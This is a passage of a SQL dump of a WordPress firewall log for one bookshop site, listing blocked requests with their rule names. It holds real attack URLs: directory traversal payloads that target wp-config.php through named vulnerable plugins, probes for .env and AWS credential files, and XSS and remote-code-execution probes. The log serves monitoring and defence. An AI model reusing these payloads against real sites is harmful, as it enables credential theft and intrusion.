rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(953,1628277129.314508,1628277128.526900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(954,1628277145.604089,1628277145.174400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(955,1628277190.524529,1628277189.704400,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(956,1628277188.442090,1628277187.992700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(957,1628359477.149828,1628359476.725300,'\0\0\0\0\0\0\0\0\0\0��X$@',0,403,0,0,0,'https://ashbooks.co.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1}'),(958,1628623931.206066,1628623930.719300,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(959,1628623920.966291,1628623919.266400,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(960,1628623913.847765,1628623913.580300,'\0\0\0\0\0\0\0\0\0\0��%\0�',0,403,0,0,0,'https://ashbooks.co.uk/wp-includes/wp-class.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(961,1628640549.594443,1628640549.153900,'\0\0\0\0\0\0\0\0\0\0��i�#v',0,403,0,0,0,'https://ashbooks.co.uk/.env',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnY=\",\"category\":\"brute-force\",\"ssl\":1}'),(962,1628736063.272926,1628736062.090000,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(963,1628736061.934945,1628736059.909500,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(964,1628929135.094539,1628929134.969600,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/options-general.php?page=smartcode',NULL,'Go-http-client/1.1','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdD5jb25zb2xlLmxvZygiTnVjbGVpIC0gT3Blbi1zb3VyY2UgcHJvamVjdCBbZ2l0aHViLmNvbS9wcm9qZWN0ZGlzY292ZXJ5L251Y2xlaV0iKTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMtZ2VuZXJhbC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(965,1628929134.874916,1628929134.227600,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://www.ashbooks.co.uk/wp-admin/options-general.php?page=smartcode',NULL,'Go-http-client/1.1','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdD5jb25zb2xlLmxvZygiTnVjbGVpIC0gT3Blbi1zb3VyY2UgcHJvamVjdCBbZ2l0aHViLmNvbS9wcm9qZWN0ZGlzY292ZXJ5L251Y2xlaV0iKTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMtZ2VuZXJhbC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(966,1628929134.874606,1628929134.227400,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/options-general.php?page=smartcode',NULL,'Go-http-client/1.1','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdD5jb25zb2xlLmxvZygiTnVjbGVpIC0gT3Blbi1zb3VyY2UgcHJvamVjdCBbZ2l0aHViLmNvbS9wcm9qZWN0ZGlzY292ZXJ5L251Y2xlaV0iKTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL29wdGlvbnMtZ2VuZXJhbC5waHA=\",\"category\":\"xss\",\"ssl\":1}'),(967,1628929136.671802,1628929136.255700,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thZGFwdGl2ZS1pbWFnZXMtc2V0dGluZ3NdW3NvdXJjZV9maWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGFwdGl2ZS1pbWFnZXMvYWRhcHRpdmUtaW1hZ2VzLXNjcmlwdC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(968,1628929136.594675,1628929136.163400,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://www.ashbooks.co.uk/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(969,1628929136.569778,1628929136.120000,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thZGFwdGl2ZS1pbWFnZXMtc2V0dGluZ3NdW3NvdXJjZV9maWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZGFwdGl2ZS1pbWFnZXMvYWRhcHRpdmUtaW1hZ2VzLXNjcmlwdC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(970,1628929136.089633,1628929135.936800,'\0\0\0\0\0\0\0\0\0\0���G\r�',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(971,0.000000,1628994940.864276,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://ashbooks.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(972,1629252953.850990,1629252949.014000,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(973,1629284910.692877,1629284910.080900,'\0\0\0\0\0\0\0\0\0\0��\rR�]',0,403,0,0,0,'https://ashbooks.co.uk/.env',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnY=\",\"category\":\"brute-force\",\"ssl\":1}'),(974,1629314010.860059,1629314010.748200,'\0\0\0\0\0\0\0\0\0\0��EÍT',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','WAF-RULE-328','{\"learningMode\":0,\"failedRules\":\"328\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2FzaGJvb2tzLmNvLnVrL3B1YmxpY19odG1sL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"bypass\",\"ssl\":1}'),(975,1629314020.287858,1629314020.185600,'\0\0\0\0\0\0\0\0\0\0��EÍT',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Modern WPBakery Page Builder Addons <= 3.0.1 Unprotected AJAX Actions','{\"learningMode\":0,\"failedRules\":\"362\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2FzaGJvb2tzLmNvLnVrL3B1YmxpY19odG1sL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"bypass\",\"ssl\":1}'),(976,1629331130.892695,1629331130.774200,'\0\0\0\0\0\0\0\0\0\0��%;5�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(977,1629331130.755640,1629331130.637300,'\0\0\0\0\0\0\0\0\0\0��%;5�',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(978,1629332370.681697,1629332370.249100,'\0\0\0\0\0\0\0\0\0\0��aD',0,403,0,0,0,'https://ashbooks.co.uk/wp-login.php?redirect_to=http%3A%2F%2Fserver217-174-240-164.live-servers.net%2Fwp-admin%2Fadmin.php%3Fpage%3Dmulti_metabox_listing%26action%3Dedit%26id%3D..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php&reauth=1',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cDovL3NlcnZlcjIxNy0xNzQtMjQwLTE2NC5saXZlLXNlcnZlcnMubmV0L3dwLWFkbWluL2FkbWluLnBocD9wYWdlPW11bHRpX21ldGFib3hfbGlzdGluZyZhY3Rpb249ZWRpdCZpZD0uLi8uLi8uLi8uLi8uLi8uLi93cC1jb25maWcucGhw\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(979,1629438260.552952,1629438260.129500,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(980,1629438258.406219,1629438257.988500,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(981,1629438256.582026,1629438256.130900,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1}'),(982,1629438253.580935,1629438253.129600,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(983,1629438251.469871,1629438251.053800,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1}'),(984,1629438249.169601,1629438249.032600,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(985,1629438246.897173,1629438246.478000,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 